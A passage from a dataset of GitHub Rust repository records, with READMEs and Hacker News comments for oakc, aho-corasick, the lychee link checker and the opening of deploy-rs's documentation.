date.\")]\n fn new(month: num, day: num, year: num) -> Date {\n return [month, day, year];\n }\n\n #[doc(\"Print the date object to STDOUT\")]\n fn print(self: &Date) {\n putnum(self->month); putchar('/');\n putnum(self->day); putchar('/');\n putnumln(self->year);\n }\n}\n\n#[doc(\"This function takes a number `n` and returns `n * n`, or `n` squared.\")]\nfn square(n: num) -> num {\n return n * n\n}\n\nfn main() {\n let d = Date::new(5, 14, 2002);\n d.print();\n}\n```\n\nAnd here is example usage of the `doc` subcommand to print the formatted documentation to the terminal.\n\n![Documentation Example](assets/doc.png)\n\n## Installation\n\n#### Development Build\nTo get the current development build, clone the repository and install it.\n\n```bash\ngit clone https://github.com/adam-mcdaniel/oakc\ncd oakc\ncargo install -f --path .\n```\n\n#### Releases\nTo get the current release build, install from [crates.io](https://crates.io/crates/oakc).\n\n```bash\n# Also works for updating oakc\ncargo install -f oakc\n```\n\n#### After Install\n\nThen, oak files can be compiled with the oakc binary.\n\n```bash\noak c examples/hello_world.ok -c\nmain.exe\n```\n\n## Dependencies\n\n**C backend**\n - Any GCC compiler that supports C99\n\n**Go backend**\n - Golang 1.14 compiler\n\n**TypeScript backend**\n\t- TypeScript 3.9 compiler", "readme_type": "markdown", "hn_comments": "Not to be confused with Oak [0], the precursor of the Java programming language.[0] 
\nhttps://en.m.wikipedia.org/wiki/Oak_(programming_language)> Every instruction operates on a memory tape. This tape is essentially a static array of double-precision floats.Why doubles? I would think integers are the more primitive type.> About the Author> I'm a freshly minted highschool graduate and freshman in college looking for work.Jesus fuck that's impressive. At that age my mind was on being bad at skateboarding, casual arson and trolling pre-2000 online placesExcellent and fun project. Error handling seems light... especially at runtime, but for a toy, its cool. Hard to argue its more portable than C until it can self host though.I thought this was going to be a troll post that links to Ook: https://esolangs.org/wiki/ook!Having it written and distributed in Rust kind of defeats the whole \u201ccompact\u201d sales pitch, as you now have to download a couple gigabytes to try it out...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "BurntSushi/aho-corasick", "link": "https://github.com/BurntSushi/aho-corasick", "tags": ["aho-corasick", "substring-matching", "finite-state-machine", "text-processing", "search"], "stars": 692, "description": "A fast implementation of Aho-Corasick in Rust.", "lang": "Rust", "repo_lang": "", "readme": "**NOTE:** This README is currently for `aho-corasick 1.0`, which\nis not yet released. The timeline for a release should be within\nthe next few months (as of 2023/01/05). [The README for the\nversion currently on crates.io can be found via the `0.7.20`\ntag.](https://github.com/BurntSushi/aho-corasick/blob/0.7.20/README.md)\n\naho-corasick\n============\nA library for finding occurrences of many patterns at once with SIMD\nacceleration in some cases. This library provides multiple pattern\nsearch principally through an implementation of the\n[Aho-Corasick algorithm](https://en.wikipedia.org/wiki/Aho%E2%80%93Corasick_algorithm),\nwhich builds a finite state machine for executing searches in linear time.\nFeatures include case insensitive matching, overlapping matches, fast searching\nvia SIMD and optional full DFA construction and search & replace in streams.\n\n[![Build status](https://github.com/BurntSushi/aho-corasick/workflows/ci/badge.svg)](https://github.com/BurntSushi/aho-corasick/actions)\n[![crates.io](https://img.shields.io/crates/v/aho-corasick.svg)](https://crates.io/crates/aho-corasick)\n\nDual-licensed under MIT or the [UNLICENSE](https://unlicense.org/).\n\n\n### Documentation\n\nhttps://docs.rs/aho-corasick\n\n\n### Usage\n\nAdd this to your `Cargo.toml`:\n\n```toml\n[dependencies]\naho-corasick = \"1\"\n```\n\n\n### Example: basic searching\n\nThis example shows how to search for occurrences of multiple patterns\nsimultaneously. 
Each match includes the pattern that matched along with the\nbyte offsets of the match.\n\n```rust\nuse aho_corasick::{AhoCorasick, PatternID};\n\nlet patterns = &[\"apple\", \"maple\", \"Snapple\"];\nlet haystack = \"Nobody likes maple in their apple flavored Snapple.\";\n\nlet ac = AhoCorasick::new(patterns).unwrap();\nlet mut matches = vec![];\nfor mat in ac.find_iter(haystack) {\n matches.push((mat.pattern(), mat.start(), mat.end()));\n}\nassert_eq!(matches, vec![\n (PatternID::must(1), 13, 18),\n (PatternID::must(0), 28, 33),\n (PatternID::must(2), 43, 50),\n]);\n```\n\n\n### Example: ASCII case insensitivity\n\nThis is like the previous example, but matches `Snapple` case insensitively\nusing `AhoCorasickBuilder`:\n\n```rust\nuse aho_corasick::{AhoCorasick, PatternID};\n\nlet patterns = &[\"apple\", \"maple\", \"snapple\"];\nlet haystack = \"Nobody likes maple in their apple flavored Snapple.\";\n\nlet ac = AhoCorasick::builder()\n .ascii_case_insensitive(true)\n .build(patterns)\n .unwrap();\nlet mut matches = vec![];\nfor mat in ac.find_iter(haystack) {\n matches.push((mat.pattern(), mat.start(), mat.end()));\n}\nassert_eq!(matches, vec![\n (PatternID::must(1), 13, 18),\n (PatternID::must(0), 28, 33),\n (PatternID::must(2), 43, 50),\n]);\n```\n\n\n### Example: replacing matches in a stream\n\nThis example shows how to execute a search and replace on a stream without\nloading the entire stream into memory first.\n\n```rust,ignore\nuse aho_corasick::AhoCorasick;\n\nlet patterns = &[\"fox\", \"brown\", \"quick\"];\nlet replace_with = &[\"sloth\", \"grey\", \"slow\"];\n\n// In a real example, these might be `std::fs::File`s instead. All you need to\n// do is supply a pair of `std::io::Read` and `std::io::Write` implementations.\nlet rdr = \"The quick brown fox.\";\nlet mut wtr = vec![];\n\nlet ac = AhoCorasick::new(patterns).unwrap();\nac.stream_replace_all(rdr.as_bytes(), &mut wtr, replace_with)\n .expect(\"stream_replace_all failed\");\nassert_eq!(b\"The slow grey sloth.\".to_vec(), wtr);\n```\n\n\n### Example: finding the leftmost first match\n\nIn the textbook description of Aho-Corasick, its formulation is typically\nstructured such that it reports all possible matches, even when they overlap\nwith another. In many cases, overlapping matches may not be desired, such as\nthe case of finding all successive non-overlapping matches like you might with\na standard regular expression.\n\nUnfortunately the \"obvious\" way to modify the Aho-Corasick algorithm to do\nthis doesn't always work in the expected way, since it will report matches as\nsoon as they are seen. For example, consider matching the regex `Samwise|Sam`\nagainst the text `Samwise`. Most regex engines (that are Perl-like, or\nnon-POSIX) will report `Samwise` as a match, but the standard Aho-Corasick\nalgorithm modified for reporting non-overlapping matches will report `Sam`.\n\nA novel contribution of this library is the ability to change the match\nsemantics of Aho-Corasick (without additional search time overhead) such that\n`Samwise` is reported instead. 
For example, here's the standard approach:\n\n```rust\nuse aho_corasick::AhoCorasick;\n\nlet patterns = &[\"Samwise\", \"Sam\"];\nlet haystack = \"Samwise\";\n\nlet ac = AhoCorasick::new(patterns).unwrap();\nlet mat = ac.find(haystack).expect(\"should have a match\");\nassert_eq!(\"Sam\", &haystack[mat.start()..mat.end()]);\n```\n\nAnd now here's the leftmost-first version, which matches how a Perl-like\nregex will work:\n\n```rust\nuse aho_corasick::{AhoCorasick, MatchKind};\n\nlet patterns = &[\"Samwise\", \"Sam\"];\nlet haystack = \"Samwise\";\n\nlet ac = AhoCorasick::builder()\n .match_kind(MatchKind::LeftmostFirst)\n .build(patterns)\n .unwrap();\nlet mat = ac.find(haystack).expect(\"should have a match\");\nassert_eq!(\"Samwise\", &haystack[mat.start()..mat.end()]);\n```\n\nIn addition to leftmost-first semantics, this library also supports\nleftmost-longest semantics, which match the POSIX behavior of a regular\nexpression alternation. See `MatchKind` in the docs for more details.\n\n\n### Minimum Rust version policy\n\nThis crate's minimum supported `rustc` version is `1.56.1`.\n\nThe current policy is that the minimum Rust version required to use this crate\ncan be increased in minor version updates. For example, if `crate 1.0` requires\nRust 1.20.0, then `crate 1.0.z` for all values of `z` will also require Rust\n1.20.0 or newer. However, `crate 1.y` for `y > 0` may require a newer minimum\nversion of Rust.\n\nIn general, this crate will be conservative with respect to the minimum\nsupported version of Rust.\n\n\n### FFI bindings\n\n* [G-Research/ahocorasick_rs](https://github.com/G-Research/ahocorasick_rs/)\nis a Python wrapper for this library.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lycheeverse/lychee", "link": "https://github.com/lycheeverse/lychee", "tags": ["link-checker", "link-checking", "link-checkers", "validator", "broken-links", "link", "check"], "stars": 692, "description": "\u26a1 Fast, async, stream-based link checker written in Rust. 
Finds broken URLs and mail addresses inside Markdown, HTML, reStructuredText, websites and more!", "lang": "Rust", "repo_lang": "", "readme": "![lychee](assets/logo.svg)\n\n[![Homepage](https://img.shields.io/badge/Homepage-Online-EA3A97)](https://lycheeverse.github.io)\n[![GitHub Marketplace](https://img.shields.io/badge/Marketplace-lychee-blue.svg?colorA=24292e&colorB=0366d6&style=flat&longCache=true&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA4AAAAOCAYAAAAfSC3RAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAM6wAADOsB5dZE0gAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAAAERSURBVCiRhZG/SsMxFEZPfsVJ61jbxaF0cRQRcRJ9hlYn30IHN/+9iquDCOIsblIrOjqKgy5aKoJQj4O3EEtbPwhJbr6Te28CmdSKeqzeqr0YbfVIrTBKakvtOl5dtTkK+v4HfA9PEyBFCY9AGVgCBLaBp1jPAyfAJ/AAdIEG0dNAiyP7+K1qIfMdonZic6+WJoBJvQlvuwDqcXadUuqPA1NKAlexbRTAIMvMOCjTbMwl1LtI/6KWJ5Q6rT6Ht1MA58AX8Apcqqt5r2qhrgAXQC3CZ6i1+KMd9TRu3MvA3aH/fFPnBodb6oe6HM8+lYHrGdRXW8M9bMZtPXUji69lmf5Cmamq7quNLFZXD9Rq7v0Bpc1o/tp0fisAAAAASUVORK5CYII=)](https://github.com/marketplace/actions/lychee-broken-link-checker)\n![Rust](https://github.com/hello-rust/lychee/workflows/CI/badge.svg)\n[![docs.rs](https://docs.rs/lychee-lib/badge.svg)](https://docs.rs/lychee-lib)\n[![Check Links](https://github.com/lycheeverse/lychee/actions/workflows/links.yml/badge.svg)](https://github.com/lycheeverse/lychee/actions/workflows/links.yml)\n[![Docker Pulls](https://img.shields.io/docker/pulls/lycheeverse/lychee?color=%23099cec&logo=Docker)](https://hub.docker.com/r/lycheeverse/lychee)\n\n\u26a1 A fast, async, stream-based link checker written in Rust.\\\nFinds broken hyperlinks and mail addresses inside Markdown, HTML,\nreStructuredText, or any other text file or website!\n\nAvailable as a command-line utility, a library and a [GitHub Action](https://github.com/lycheeverse/lychee-action).\n\n![Lychee demo](./assets/screencast.svg)\n\n## Installation\n\n### Arch Linux\n\n```sh\npacman -S lychee-link-checker\n```\n\n### macOS\n\n```sh\nbrew install lychee\n```\n\n### Docker\n\n```sh\ndocker pull lycheeverse/lychee\n```\n\n### NixOS\n\n```sh\nnix-env -iA nixos.lychee\n```\n\n### FreeBSD\n\n```sh\npkg install lychee\n```\n\n### Scoop\n\n```sh\nscoop install lychee\n```\n\n### Termux\n\n```sh\npkg install lychee\n```\n\n### Pre-built binaries\n\nWe provide binaries for Linux, macOS, and Windows for every release. \\\nYou can download them from the [releases page](https://github.com/lycheeverse/lychee/releases).\n\n### Cargo\n\n#### Build dependencies\n\nOn APT/dpkg-based Linux distros (e.g. Debian, Ubuntu, Linux Mint and Kali Linux)\nthe following commands will install all required build dependencies, including\nthe Rust toolchain and `cargo`:\n\n```sh\ncurl -sSf 'https://sh.rustup.rs' | sh\napt install gcc pkg-config libc6-dev libssl-dev\n```\n\n#### Compile and install lychee\n\n```sh\ncargo install lychee\n```\n\n## Features\n\nThis comparison is made on a best-effort basis. 
Please create a PR to fix\noutdated information.\n\n| | lychee | [awesome_bot] | [muffet] | [broken-link-checker] | [linkinator] | [linkchecker] | [markdown-link-check] | [fink] |\n| -------------------- | ------- | ------------- | -------- | --------------------- | ------------ | -------------------- | --------------------- | ------ |\n| Language | Rust | Ruby | Go | JS | TypeScript | Python | JS | PHP |\n| Async/Parallel | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] |\n| JSON output | ![yes] | ![no] | ![yes] | ![yes] | ![yes] | ![maybe]1 | ![yes] | ![yes] |\n| Static binary | ![yes] | ![no] | ![yes] | ![no] | ![no] | \ufe0f![no] | ![no] | ![no] |\n| Markdown files | ![yes] | ![yes] | ![no] | ![no] | ![no] | ![yes] | ![yes] | ![no] |\n| HTML files | ![yes] | ![no] | ![no] | ![yes] | ![yes] | ![no] | ![yes] | ![no] |\n| Text files | ![yes] | ![no] | ![no] | ![no] | ![no] | ![no] | ![no] | ![no] |\n| Website support | ![yes] | ![no] | ![yes] | ![yes] | ![yes] | ![yes] | ![no] | ![yes] |\n| Chunked encodings | ![yes] | ![maybe] | ![maybe] | ![maybe] | ![maybe] | ![no] | ![yes] | ![yes] |\n| GZIP compression | ![yes] | ![maybe] | ![maybe] | ![yes] | ![maybe] | ![yes] | ![maybe] | ![no] |\n| Basic Auth | ![yes] | ![no] | ![no] | ![yes] | ![no] | ![yes] | ![no] | ![no] |\n| Custom user agent | ![yes] | ![no] | ![no] | ![yes] | ![no] | ![yes] | ![no] | ![no] |\n| Relative URLs | ![yes] | ![yes] | ![no] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] |\n| Skip relative URLs | ![yes] | ![no] | ![no] | ![maybe] | ![no] | ![no] | ![no] | ![no] |\n| Include patterns | ![yes]\ufe0f | ![yes] | ![no] | ![yes] | ![no] | ![no] | ![no] | ![no] |\n| Exclude patterns | ![yes] | ![no] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] |\n| Handle redirects | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] |\n| Ignore insecure SSL | ![yes] | ![yes] | ![yes] | ![no] | ![no] | ![yes] | ![no] | ![yes] |\n| File globbing | ![yes] | ![yes] | ![no] | ![no] | ![yes] | ![no] | ![yes] | ![no] |\n| Limit scheme | ![yes] | ![no] | ![no] | ![yes] | ![no] | ![yes] | ![no] | ![no] |\n| [Custom headers] | ![yes] | ![no] | ![yes] | ![no] | ![no] | ![no] | ![yes] | ![yes] |\n| Summary | ![yes] | ![yes] | ![yes] | ![maybe] | ![yes] | ![yes] | ![no] | ![yes] |\n| `HEAD` requests | ![yes] | ![yes] | ![no] | ![yes] | ![yes] | ![yes] | ![no] | ![no] |\n| Colored output | ![yes] | ![maybe] | ![yes] | ![maybe] | ![yes] | ![yes] | ![no] | ![yes] |\n| [Filter status code] | ![yes] | ![yes] | ![no] | ![no] | ![no] | ![no] | ![yes] | ![no] |\n| Custom timeout | ![yes] | ![yes] | ![yes] | ![no] | ![yes] | ![yes] | ![no] | ![yes] |\n| E-mail links | ![yes] | ![no] | ![no] | ![no] | ![no] | ![yes] | ![no] | ![no] |\n| Progress bar | ![yes] | ![yes] | ![no] | ![no] | ![no] | ![yes] | ![yes] | ![yes] |\n| Retry and backoff | ![yes] | ![no] | ![no] | ![no] | ![yes] | ![no] | ![yes] | ![no] |\n| Skip private domains | ![yes] | ![no] | ![no] | ![no] | ![no] | ![no] | ![no] | ![no] |\n| [Use as library] | ![yes] | ![yes] | ![no] | ![yes] | ![yes] | ![no] | ![yes] | ![no] |\n| Quiet mode | ![yes] | ![no] | ![no] | ![no] | ![yes] | ![yes] | ![yes] | ![yes] |\n| [Config file] | ![yes] | ![no] | ![no] | ![no] | ![yes] | ![yes] | ![yes] | ![no] |\n| Recursion | ![no] | ![no] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![no] |\n| Amazing lychee logo | ![yes] | ![no] | ![no] | ![no] | ![no] | ![no] | ![no] | ![no] |\n\n[awesome_bot]: https://github.com/dkhamsing/awesome_bot\n[muffet]: 
https://github.com/raviqqe/muffet\n[broken-link-checker]: https://github.com/stevenvachon/broken-link-checker\n[linkinator]: https://github.com/JustinBeckwith/linkinator\n[linkchecker]: https://github.com/linkchecker/linkchecker\n[markdown-link-check]: https://github.com/tcort/markdown-link-check\n[fink]: https://github.com/dantleech/fink\n[yes]: ./assets/yes.svg\n[no]: ./assets/no.svg\n[maybe]: ./assets/maybe.svg\n[custom headers]: https://github.com/rust-lang/crates.io/issues/788\n[filter status code]: https://github.com/tcort/markdown-link-check/issues/94\n[skip private domains]: https://github.com/appscodelabs/liche/blob/a5102b0bf90203b467a4f3b4597d22cd83d94f99/url_checker.go\n[use as library]: https://github.com/raviqqe/liche/issues/13\n[config file]: https://github.com/lycheeverse/lychee/blob/master/lychee.example.toml\n\n1 Other machine-readable formats like CSV are supported.\n\n## Commandline usage\n\nRecursively check all links in supported files inside the current directory\n\n```sh\nlychee .\n```\n\nYou can also specify various types of inputs:\n\n```sh\n# check links in specific local file(s):\nlychee README.md\nlychee test.html info.txt\n\n# check links on a website:\nlychee https://endler.dev\n\n# check links in directory but block network requests\nlychee --offline path/to/directory\n\n# check links in a remote file:\nlychee https://raw.githubusercontent.com/lycheeverse/lychee/master/README.md\n\n# check links in local files via shell glob:\nlychee ~/projects/*/README.md\n\n# check links in local files (lychee supports advanced globbing and ~ expansion):\nlychee \"~/projects/big_project/**/README.*\"\n\n# ignore case when globbing and check result for each link:\nlychee --glob-ignore-case --verbose \"~/projects/**/[r]eadme.*\"\n\n# check links from epub file (requires atool: https://www.nongnu.org/atool)\nacat -F zip {file.epub} \"*.xhtml\" \"*.html\" | lychee -\n```\n\nlychee parses other file formats as plaintext and extracts links using [linkify](https://github.com/robinst/linkify).\nThis generally works well if there are no format or encoding specifics,\nbut in case you need dedicated support for a new file format, please consider creating an issue.\n\n### Docker Usage\n\nHere's how to mount a local directory into the container and check some input\nwith lychee. The `--init` parameter is passed so that lychee can be stopped\nfrom the terminal. We also pass `-it` to start an interactive terminal, which\nis required to show the progress bar.\n\n```sh\ndocker run --init -it -v `pwd`:/input lycheeverse/lychee /input/README.md\n```\n\n### GitHub Token\n\nTo avoid getting rate-limited while checking GitHub links, you can optionally\nset an environment variable with your GitHub token like so: `GITHUB_TOKEN=xxxx`,\nor use the `--github-token` CLI option. It can also be set in the config file.\n[Here is an example config file][config file].\n\nThe token can be generated in your\n[GitHub account settings page](https://github.com/settings/tokens). A personal\ntoken with no extra permissions is enough to be able to check public repo links.\n\n### Commandline Parameters\n\nThere is an extensive list of commandline parameters to customize the behavior.\nSee below for a full list.\n\n```text\nA fast, async link checker\n\nFinds broken URLs and mail addresses inside Markdown, HTML, `reStructuredText`, websites and more!\n\nUsage: lychee [OPTIONS] ...\n\nArguments:\n ...\n The inputs (where to get links to check from). These can be: files (e.g. `README.md`), file globs (e.g. 
`\"~/git/*/README.md\"`), remote URLs (e.g. `https://example.com/README.md`) or standard input (`-`). NOTE: Use `--` to separate inputs from options that allow multiple arguments\n\nOptions:\n -c, --config \n Configuration file to use\n \n [default: ./lychee.toml]\n\n -v, --verbose...\n Set verbosity level; more output per occurrence (e.g. `-v` or `-vv`)\n\n -q, --quiet...\n Less output per occurrence (e.g. `-q` or `-qq`)\n\n -n, --no-progress\n Do not show progress bar.\n This is recommended for non-interactive shells (e.g. for continuous integration)\n\n --cache\n Use request cache stored on disk at `.lycheecache`\n\n --max-cache-age \n Discard all cached requests older than this duration\n \n [default: 1d]\n\n --dump\n Don't perform any link checking. Instead, dump all the links extracted from inputs that would be checked\n\n -m, --max-redirects \n Maximum number of allowed redirects\n \n [default: 5]\n\n --max-retries \n Maximum number of retries per request\n \n [default: 3]\n\n --max-concurrency \n Maximum number of concurrent network requests\n \n [default: 128]\n\n -T, --threads \n Number of threads to utilize. Defaults to number of cores available to the system\n\n -u, --user-agent \n User agent\n \n [default: lychee/0.10.3]\n\n -i, --insecure\n Proceed for server connections considered insecure (invalid TLS)\n\n -s, --scheme \n Only test links with the given schemes (e.g. http and https)\n\n --offline\n Only check local files and block network requests\n\n --include \n URLs to check (supports regex). Has preference over all excludes\n\n --exclude \n Exclude URLs and mail addresses from checking (supports regex)\n\n --exclude-file \n Deprecated; use `--exclude-path` instead\n\n --exclude-path \n Exclude file path from getting checked\n\n -E, --exclude-all-private\n Exclude all private IPs from checking.\n Equivalent to `--exclude-private --exclude-link-local --exclude-loopback`\n\n --exclude-private\n Exclude private IP address ranges from checking\n\n --exclude-link-local\n Exclude link-local IP address range from checking\n\n --exclude-loopback\n Exclude loopback IP address range and localhost from checking\n\n --exclude-mail\n Exclude all mail addresses from checking\n\n --remap \n Remap URI matching pattern to different URI\n\n --header
\n Custom request header\n\n -a, --accept \n Comma-separated list of accepted status codes for valid links\n\n -t, --timeout \n Website timeout in seconds from connect to response finished\n \n [default: 20]\n\n -r, --retry-wait-time \n Minimum wait time in seconds between retries of failed requests\n \n [default: 1]\n\n -X, --method \n Request method\n \n [default: get]\n\n -b, --base \n Base URL or website root directory to check relative URLs e.g. https://example.com or `/path/to/public`\n\n --basic-auth \n Basic authentication support. E.g. `username:password`\n\n --github-token \n GitHub API token to use when checking github.com links, to avoid rate limiting\n \n [env: GITHUB_TOKEN]\n\n --skip-missing\n Skip missing input files (default is to error if they don't exist)\n\n --include-verbatim\n Find links in verbatim sections like `pre`- and `code` blocks\n\n --glob-ignore-case\n Ignore case when expanding filesystem path glob inputs\n\n -o, --output \n Output file of status report\n\n -f, --format \n Output format of final status report (compact, detailed, json, markdown)\n \n [default: compact]\n\n --require-https\n When HTTPS is available, treat HTTP links as errors\n\n -h, --help\n Print help (see a summary with '-h')\n\n -V, --version\n Print version\n\n```\n\n### Exit codes\n\n- `0` for success (all links checked successfully or excluded/skipped as configured)\n- `1` for missing inputs and any unexpected runtime failures or config errors\n- `2` for link check failures (if any non-excluded link failed the check)\n\n### Ignoring links\n\nYou can exclude links from getting checked by specifying regex patterns\nwith `--exclude` (e.g. `--exclude example\\.(com|org)`).\nIf a file named `.lycheeignore` exists in the current working directory, its\ncontents are excluded as well. The file allows you to list multiple regular\nexpressions for exclusion (one pattern per line).\n\nFor excluding files/directories from being scanned use `lychee.toml`\nand `exclude_path`.\n\n```toml\nexclude_path = [\"some/path\", \"*/dev/*\"]\n```\n\n### Caching\n\nIf the `--cache` flag is set, lychee will cache responses in a file called\n`.lycheecache` in the current directory. If the file exists and the flag is set,\nthen the cache will be loaded on startup. 
This can greatly speed up future runs.\nNote that by default lychee will not store any data on disk.\n\n## Library usage\n\nYou can use lychee as a library for your own projects!\nHere is a \"hello world\" example:\n\n```rust\nuse lychee_lib::Result;\n\n#[tokio::main]\nasync fn main() -> Result<()> {\n let response = lychee_lib::check(\"https://github.com/lycheeverse/lychee\").await?;\n println!(\"{response}\");\n Ok(())\n}\n```\n\nThis is equivalent to the following snippet, in which we build our own client:\n\n```rust\nuse lychee_lib::{ClientBuilder, Result, Status};\n\n#[tokio::main]\nasync fn main() -> Result<()> {\n let client = ClientBuilder::default().client()?;\n let response = client.check(\"https://github.com/lycheeverse/lychee\").await?;\n assert!(response.status().is_success());\n Ok(())\n}\n```\n\nThe client builder is very customizable:\n\n```rust, ignore\nlet client = lychee_lib::ClientBuilder::builder()\n .includes(includes)\n .excludes(excludes)\n .max_redirects(cfg.max_redirects)\n .user_agent(cfg.user_agent)\n .allow_insecure(cfg.insecure)\n .custom_headers(headers)\n .method(method)\n .timeout(timeout)\n .github_token(cfg.github_token)\n .scheme(cfg.scheme)\n .accepted(accepted)\n .build()\n .client()?;\n```\n\nAll options that you set will be used for all link checks.\nSee the [builder\ndocumentation](https://docs.rs/lychee-lib/latest/lychee_lib/struct.ClientBuilder.html)\nfor all options. For more information, check out the [examples](examples)\nfolder.\n\n## GitHub Action Usage\n\nA GitHub Action that uses lychee is available as a separate repository: [lycheeverse/lychee-action](https://github.com/lycheeverse/lychee-action)\nwhich includes usage instructions.\n\n## Contributing to lychee\n\nWe'd be thankful for any contribution. \\\nWe try to keep the issue-tracker up-to-date so you can quickly find a task to work on.\n\nTry one of these links to get started:\n\n- [good first issues](https://github.com/lycheeverse/lychee/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22)\n- [help wanted](https://github.com/lycheeverse/lychee/issues?q=is%3Aissue+is%3Aopen+label%3A%22help+wanted%22)\n\nFor more detailed instructions, head over to [`CONTRIBUTING.md`](/CONTRIBUTING.md).\n\n## Debugging and improving async code\n\nLychee makes heavy use of async code to be resource-friendly while still being\nperformant. Async code can be difficult to troubleshoot with most tools,\nhowever. Therefore we provide experimental support for\n[tokio-console](https://github.com/tokio-rs/console). 
It provides a top(1)-like\noverview for async tasks!\n\nIf you want to give it a spin, download and start the console:\n\n```sh\ngit clone https://github.com/tokio-rs/console\ncd console\ncargo run\n```\n\nThen run lychee with some special flags and features enabled.\n\n```sh\nRUSTFLAGS=\"--cfg tokio_unstable\" cargo run --features tokio-console -- ...\n```\n\nIf you find a way to make lychee faster, please do reach out.\n\n## Troubleshooting and Workarounds\n\nWe collect a list of common workarounds for various websites in our [troubleshooting guide](./docs/TROUBLESHOOTING.md).\n\n## Users\n\n- https://github.com/InnerSourceCommons/InnerSourcePatterns\n- https://github.com/opensearch-project/OpenSearch\n- https://github.com/ramitsurana/awesome-kubernetes\n- https://github.com/papers-we-love/papers-we-love\n- https://github.com/pingcap/docs\n- https://github.com/microsoft/WhatTheHack\n- https://github.com/Azure/ResourceModules\n- https://github.com/nix-community/awesome-nix\n- https://github.com/balena-io/docs\n- https://github.com/launchdarkly/LaunchDarkly-Docs\n- https://github.com/pawroman/links\n- https://github.com/analysis-tools-dev/static-analysis\n- https://github.com/analysis-tools-dev/dynamic-analysis\n- https://github.com/mre/idiomatic-rust\n- https://github.com/lycheeverse/lychee (yes, the lychee docs are checked with lychee \ud83e\udd2f)\n\nIf you are using lychee for your project, **please add it here**.\n\n## Credits\n\nThe first prototype of lychee was built in [episode 10 of Hello\nRust](https://hello-rust.show/10/). Thanks to all Github- and Patreon sponsors\nfor supporting the development since the beginning. Also, thanks to all the\ngreat contributors who have since made this project more mature.\n\n## License\n\nlychee is licensed under either of\n\n- Apache License, Version 2.0, (LICENSE-APACHE or\n https://www.apache.org/licenses/LICENSE-2.0)\n- MIT license (LICENSE-MIT or https://opensource.org/licenses/MIT)\n\nat your option.\n", "readme_type": "markdown", "hn_comments": "feature rich tool that seems to work fine and fast, so fast that HN starts blocking requests almost immediately. also great to see a windows executable available.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "serokell/deploy-rs", "link": "https://github.com/serokell/deploy-rs", "tags": ["nix", "nixos", "deployment", "nix-flake", "flakes", "tool"], "stars": 689, "description": "A simple multi-profile Nix-flake deploy tool.", "lang": "Rust", "repo_lang": "", "readme": "\n\n![deploy-rs logo](./docs/logo.svg \"deploy-rs\")\n\n---\n\nA Simple, multi-profile Nix-flake deploy tool.\n\nQuestions? Need help? Join us on Matrix: [`#deploy-rs:matrix.org`](https://matrix.to/#/#deploy-rs:matrix.org)\n\n## Usage\n\nBasic usage: `deploy [options] `.\n\nUsing this method all profiles specified in the given `` will be deployed (taking into account the [`profilesOrder`](#node)).\n\n Optionally the flake can be constrained to deploy just a single node (`my-flake#my-node`) or a profile (`my-flake#my-node.my-profile`).\n\nIf your profile or node name has a . in it, simply wrap it in quotes, and the flake path in quotes (to avoid shell escaping), for example 'my-flake#\"myserver.com\".system'.\n\nAny \"extra\" arguments will be passed into the Nix calls, so for instance to deploy an impure profile, you may use `deploy . 
-- --impure` (note the explicit flake path is necessary for doing this).\n\nYou can try out this tool easily with `nix run`:\n- `nix run github:serokell/deploy-rs your-flake`\n\nIf you want to deploy multiple flakes or a subset of profiles with one invocation, instead of calling `deploy <flake>` you can issue `deploy --targets <flake> [<flake> ...]` where `<flake>` is supposed to take the same format as discussed before.\n\nRunning in this mode, if any of the deploys fails, the deploy will be aborted and all successful deploys rolled back. `--rollback-succeeded false` can be used to override this behavior; otherwise the `auto-rollback` argument takes precedence.\n\nIf you require a signing key to push closures to your server, specify the path to it in the `LOCAL_KEY` environment variable.\n\nCheck out `deploy --help` for CLI flags! Remember to check there before making one-time changes to things like hostnames.\n\nThere is also an `activate` binary, though this should be ignored; it is only used internally (on the deployed system) and for testing/hacking purposes.\n\n## Ideas\n\n`deploy-rs` is a simple Rust program that will take a Nix flake and use it to deploy any of your defined profiles to your nodes. This is _strongly_ based off of [serokell/deploy](https://github.com/serokell/deploy), designed to replace it and expand upon it.\n\n### Multi-profile\n\nThis type of design (as opposed to more traditional tools like NixOps or morph) allows for lesser-privileged deployments, and the ability to update different things independently of each other. You can deploy any type of profile to any user, not just a NixOS profile to `root`.\n\n### Magic Rollback\n\nThere is a built-in feature to prevent you from making changes that might render your machine unconnectable or unusable, which works by connecting to the machine after profile activation to confirm the machine is still available, and instructing the target node to automatically roll back if it is not confirmed. If you do not disable `magicRollback` in your configuration (see later sections) or with the CLI flag, you will be unable to make changes to the system which will affect you connecting to it (changing SSH port, changing your IP, etc).\n\n## API\n\n### Overall usage\n\n`deploy-rs` is designed to be used with Nix flakes (this currently requires an unstable version of Nix to work with). 
There is a Flake-less mode of operation which will automatically be used if your available Nix version does not support flakes, however you will likely want to use a flake anyway, just with `flake-compat` (see [this wiki page](https://nixos.wiki/wiki/Flakes) for usage).\n\n`deploy-rs` also outputs a `lib` attribute, with tools used to make your definitions simpler and safer, including `deploy-rs.lib.${system}.activate` (see later section \"Profile\"), and `deploy-rs.lib.${system}.deployChecks` which will let `nix flake check` ensure your deployment is defined correctly.\n\nThere are full working deploy-rs Nix expressions in the [examples folder](./examples), and there is a JSON schema [here](./interface.json) which is used internally by the `deployChecks` mentioned above to validate your expressions.\n\nA basic example of a flake that works with `deploy-rs` and deploys a simple NixOS configuration could look like this\n\n```nix\n{\n description = \"Deployment for my server cluster\";\n\n # For accessing `deploy-rs`'s utility Nix functions\n inputs.deploy-rs.url = \"github:serokell/deploy-rs\";\n\n outputs = { self, nixpkgs, deploy-rs }: {\n nixosConfigurations.some-random-system = nixpkgs.lib.nixosSystem {\n system = \"x86_64-linux\";\n modules = [ 